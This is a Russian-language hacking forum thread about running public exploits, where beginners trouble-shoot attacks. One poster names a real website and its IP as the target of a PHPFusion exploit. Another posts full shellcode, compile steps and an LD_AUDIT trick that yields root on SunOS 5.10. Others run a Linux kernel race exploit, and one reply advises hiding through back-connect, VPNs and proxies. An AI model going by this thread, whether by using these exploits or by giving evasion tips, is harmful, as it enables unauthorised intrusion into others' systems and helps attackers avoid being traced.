Запускаем сплойты

вопрос по инструкции

Взял на пробу такой эксплойт: http://forum.antichat.ru/threadnav25249-1-10.html

нашел инструкцию: http://forum.antichat.ru/threadnav26510-1-10.html

далее нашел вот это:

Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to PHPFusion
Options:
-T[prefix: specify a table prefix (default: fusion_)
-p[port]: specify a port other than 80
-P[iport]: specify a proxy
Examples:
php '.$argv[0].' localhost /fusion/
php '.$argv[0].' localhost /fusion/ -p81
php '.$argv[0].' localhost / -P1.1.1.1:80

цель выбрал эту - www.conadsis.com (IP: 70.86.20.18)

php у меня на c:\php\php.exe там же и sploit.php

пишу по инструкции (cmd):

c:\php\php.exe c:\php\sploit.php '.$argv[0].' 70.86.20.18
или
c:\php\php.exe c:\php\sploit.php '.$argv[0].' www.conadsis.com

получаю какую-то херню ввиде прокрутки текста эксплойта.

В чем ошибка? Правильно ли записываю аргументы? Может быт при инсталяции php надо указывать какие-нибудь опции?

P.S. Пробую впервые, для спортивного интересу, php и perl не знаю, но, вроде, по написаному ничего сложного нет.

 

Такая же проблема, не разобрался с php сплойтом, тже выдаёт весь php код, как же правильно запускать?

 

memo, посмотри внимательнее usage, там не только сайт надо указать, но и папку с /fusion/ т.е. со скриптом, мб в этой трабла? и чё-то меня этот аргумент в чистом виде не вдохновляет)) хотя хз, не юзал)

 

я фигею статья норм для нубов пусть учатся--- но почему статья как запускать сплойты под виндой в ращделе сервера -- динукс --- вопрос на засыпку

 

genom--
Потому что большинство сплойтов ориентировано на *nix-системы, и люди именно в этих ветках и ищут ответы на свои вопросы.

 

могу видео снять по установке и запуску предпологаемых експлойтов смотреть будите ?

 

ground_zero
Зачем? Итак ведь все описано и разжевано.

 

Во-вторых, вы используете бэкконнект, следовательно и доказать, что это вы использовали сплоит будет сложнее (ведь по логам серв сам к вам подключился - можно просто сделать глупое выражение лица и сказать, что не знаете, зачем он к вам постучался на порт).

Ппц как неактуально - тратишь лишние 50$/месяц - покупаешь VPN от ачата + проксисы (от.... "здесь млга быть Ваша реклама") - и не недо ипацца с логами.
PS: нет повести печальнее на свете, тьфу... нет паливнее способа, чем юзать сплоиты со своей машины под любым IP изначально.

 

Снямешь видео - плюсы и респекты - в приницпе видео не тяжелое, но полезное - как в плане актуальности, так и в плане обновления раздела видео.

 

Эм... наверное "сильно" тупой вопрос- Как убрать защиту от таких как я(скрипткидис вроде зовется =)), а то на С скачал сплоит... а он не компилируется(это вроде бы так называется =)) =/

 

Учить Си. В каждом сплойте разные ошибки, где-то кавычка в другую сторону, где буква в операторе пропущена. А вообще, пробуй компилировать, смотри, на какие строки ругается компилятор, бери справочник и сверяй.

 

Ок... спасибо =)

 

после такой компиляции со справочником этот сплойт привратитса во что угодно вплоть до эмулятора os/2 но только не експлойт =))) а вот учи С это на самом деле полезный совет .

 

Подскажите плз.
Нашел сплоит для SunOS 5.10, не понимаю как пользаваться. Эт тип PoC код какой-то.

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

 

Создаешь файл dupa.c со следующим содержанием:

Code:

static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

Компилируешь:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c
Собираешь:
setenv LD_AUDIT /tmp/dupa.so

 

А его обязательно компилить и собирать на удаленой машине или откомпилировать можно у себя?

 

Bac9l
Желательно на удаленной, хотя в некоторых случаях возможно и на локальной (зависит от сплойта).

 

1. Linux 2.4.25 SMP
2. Права nobody.
Судя по всему, может порутать только uslibpr.c.
Собрал, запускаю:

./libr -d 0

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xe7800000 - 0xffffd000
Wait... -
[+] race won maps=211

И так и висит. Вопрос - это нормально, или сплойт повис?))

P.S. Без параметра -d 0 выплевывает ошибку после Wait.

 

значит время для ожидания выполнения закончено нет конекта с сервером или код в установленный промежуток выполнить не удалось .

 

ground_zero, это во втором случае, если без -d 0. А что с первым?